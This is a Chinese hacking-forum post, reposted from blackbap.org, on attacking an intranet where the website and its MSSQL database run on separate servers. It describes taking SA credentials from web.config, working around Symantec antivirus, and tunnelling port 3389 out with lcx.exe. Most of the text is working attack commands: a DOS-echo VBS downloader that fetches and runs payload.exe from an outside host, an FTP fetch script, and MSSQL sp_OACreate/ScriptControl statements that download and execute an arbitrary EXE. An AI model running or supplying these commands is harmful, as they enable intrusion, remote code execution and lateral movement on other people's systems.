MSSQL站库分离情况的渗透思路

本文转自:http://bbs.blackbap.org/thread-6203-1-2.html

1. 服务器属内网环境,站库分离,通过web.config找到数据库服务库SA帐号密码,成功添加用户(192.168.0.206) 。
2. Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件,不能转lcx.exe工具转发 。
3. 测试过其它的转发工具,要么被查杀,要么无法用,使用reDuh工具只能转发当前IP的,而且速度极慢,受不了0.0 。
4. 使用msfpayload生成的exe文件也被查杀,由于服务器是x64的,msfencode没有x64的编码器,所以没能反弹成功 。

思路1:关闭杀软,通过以下提供的命令下载文件(未测试)
思路2:使用msf aspx反弹,然后进行转发及跨路由渗透(已成功)

正常思路:如果没有杀软,直接传lcx.exe到192.168.0.203上,然后使用以下命令转发192.168.0.206:
c:\lcx.exe -slave 你的外网IP 51 192.168.0.206 3389                // 看了这个后,你们应该都懂的吧 0.0 。

DOS命令:(一条一条执行)

  1. echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
  2. echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
  3. echo Post.Open "GET","http://bbs.blackbap.org/payload.exe",0 >>xxx.vbs
  4. echo Post.Send() >>xxx.vbs
  5. echo Set aGet = CreateObject("ADODB.Stream") >>xxxc.vbs
  6. echo aGet.Mode = 3 >>xxx.vbs
  7. echo aGet.Type = 1 >>xxx.vbs
  8. echo aGet.Open() >>xxx.vbs
  9. echo aGet.Write(Post.responseBody) >>xxx.vbs
  10. echo aGet.SaveToFile "c:\xxxc.exe",2 >>xxx.vbs
  11. echo wscript.sleep 1000 >>xxxc.vbs
  12. echo Shell.Run ("c:\xxx.exe") >>xxx.vbs
复制代码
  1. echo open 127.0.0.1>c:\ftp.dat
  2. echo admin>>c:\ftp.dat
  3. echo admin>>c:\ftp.dat
  4. echo binary>>c:\ftp.dat
  5. echo get lcx.exe>>c:\ftp.dat
  6. echo bye>>c:\ftp.dat
  7. ftp -s:c:\ftp.dat
复制代码

MSSQL 命令:

  1. DECLARE @js int
  2. EXEC sp_OACreate 'ScriptControl',@js OUT
  3. EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
  4. EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "Url",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\windows\\自己设置保存的EXE文件名.exe",2);var r = new ActiveXObject("WScript.Shell");r.Run("C:\\windows\\自己设置保存的EXE文件名.exe");'
复制代码
  1. declare @o int, @f int, @t int, @ret int
  2. exec sp_oacreate 'scripting.filesystemobject', @o out
  3. exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
  4. exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
  5. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp账号'
  6. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密码'
  7. exec @ret = sp_oamethod @f, 'writeline', NULL,'get lcx.exe'
  8. exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'

你可能感兴趣的:(MSSQL)